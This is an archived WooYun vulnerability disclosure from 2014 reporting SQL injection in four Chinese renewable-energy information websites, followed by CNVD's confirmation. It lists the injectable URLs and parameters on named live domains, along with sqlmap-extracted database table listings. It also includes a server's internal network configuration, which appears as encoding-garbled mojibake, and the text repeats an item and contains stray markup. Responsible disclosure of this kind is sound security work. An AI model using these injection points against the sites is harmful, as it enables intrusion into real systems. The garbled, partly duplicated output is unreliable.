乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-25: 细节已通知厂商并且等待厂商处理中 2014-06-29: 厂商已经确认,细节仅向厂商公开 2014-07-09: 细节向核心白帽子及相关领域专家公开 2014-07-19: 细节向普通白帽子公开 2014-07-29: 细节向实习白帽子公开 2014-08-09: 细节向公众公开
国家水电水利规划设计总院多个系统涉及SQL注入
水电水利规划设计总院是在2002年12月电力体制改革中经国务院批准保留的事业单位,现隶属于中国电力建设集团有限公司管理。水电水利规划设计总院的定位是:为政府行使职能提供支持保障、提供公益服务并可部分实现由市场配置资源的企业化管理事业单位,国家有关部门委托的水电、风电、太阳能光伏发电等行业技术管理单位,电力、水利和清洁可再生能源开发建设的产业政策研究中心。
---- 维护单位:北京木联能软件技术有限公司 --1.可再生能源安全信息网2.可再生能源工程造价信息网3.可再生能源电价附加信息管理平台(国家可再生能源信息管理中心)4.中国风力发电工程信息网(国家风电信息管理中心)
1.可再生能源安全信息网:sql注入
http://www.hydrosafety.org.cn/newsDetail.action?newsId=1027&pcol=23
---web application technology: JSPback-end DBMS: Microsoft SQL Server 2008Database: Safetyweb[19 tables]+-----------------+| T_MANAGER || User2 || count || mvDoc || mvModulFunction || mvRoleFunction || mvWorkItem || mvWorkItemHis || r_appendix || r_c_user || r_complaints || r_report || r_user || ws_appendix || ws_column || ws_manageunit || ws_news || ws_news_column || ws_train_info |+-----------------+
2.可再生能源工程造价信息网:sql注入
http://www.hydrocost.org.cn/commongner/files/newsshows.jsp?id=2690
ŇÔĚŤÍřĘĘĹäĆ÷ ąžľŘÁŹ˝Ó: ÁŹ˝ÓĚŘś¨ľÄ DNS şó׺ . . . . . . . : ĂčĘö. . . . . . . . . . . . . . . : HP NC375i Integrated Quad Port Multifunction Gigabit Server Adapter ÎďŔíľŘÖˇ. . . . . . . . . . . . . : E8-39-35-C0-3A-C0 DHCP ŇŃĆôÓĂ . . . . . . . . . . . : ˇń ×ÔśŻĹäÖĂŇŃĆôÓĂ. . . . . . . . . . : ĘÇ ąžľŘÁ´˝Ó IPv6 ľŘÖˇ. . . . . . . . : fe80::bc34:5825:bbe1:91f4(Ę×ŃĄ) IPv4 ľŘÖˇ . . . . . . . . . . . . : 10.86.0.8(Ę×ŃĄ) ×ÓÍřŃÚÂë . . . . . . . . . . . . : 255.255.252.0 ÄŹČĎÍřšŘ. . . . . . . . . . . . . : 10.86.0.254 DHCPv6 IAID . . . . . . . . . . . : 250100021 DHCPv6 żÍť§śË DUID . . . . . . . : 00-01-00-01-1A-57-F7-BD-E8-39-35-C0-3A-C0 DNS ˇţÎńĆ÷ . . . . . . . . . . . : 10.85.0.1 10.85.0.2 TCPIP ÉĎľÄ NetBIOS . . . . . . . : ŇŃĆôÓĂ ËíľŔĘĘĹäĆ÷ isatap.{1453F5F2-7835-4A6A-9193-D51385E4892F}: Ă˝Ěĺ×´ĚŹ . . . . . . . . . . . . : Ă˝ĚĺŇŃśĎżŞ ÁŹ˝ÓĚŘś¨ľÄ DNS şó׺ . . . . . . . : ĂčĘö. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter ÎďŔíľŘÖˇ. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---
3.可再生能源电价附加信息管理平台(国家可再生能源信息管理中心):sql注入
http://211.160.21.236:1001/training/application/certView.jsp?apxid=72734 /code> 4.中国风力发电工程信息网(国家风电信息管理中心):sql注入<code>http://www.windpower.org.cn/jobs/jobView.jsp?id=901
4.中国风力发电工程信息网(国家风电信息管理中心):sql注入<code>http://www.windpower.org.cn/jobs/jobView.jsp?id=901
web application technology: JSPback-end DBMS: Microsoft SQL Server 2008Database: windpower_new[34 tables]+----------------------+| D99_CMD || D99_Tmp || S3_Tmp || count || user || admin || bbs || bbs_type || busiInfo || business || contrib || dtproperties || enterprise || fdsb || fdsb_type || jobInfo || laws || laws_type || member || news || news_type || personResume || picnews || picnews1 || picnews_shey || picnews_type || report_investigation || result || result_type || sqlmapoutput || tech || tech_type || tradeWeb || wp_province |+----------------------+
危害等级:高
漏洞Rank:20
确认时间:2014-06-29 21:39
CNVD确认并复现所述多个案例情况,根据单位归属管理,后续转由CNCERT向电力行业信息化主管部门——国家能源局信息中心通报,由其后续协调网站管理单位处置。按多个漏洞综合评分,rank 20
暂无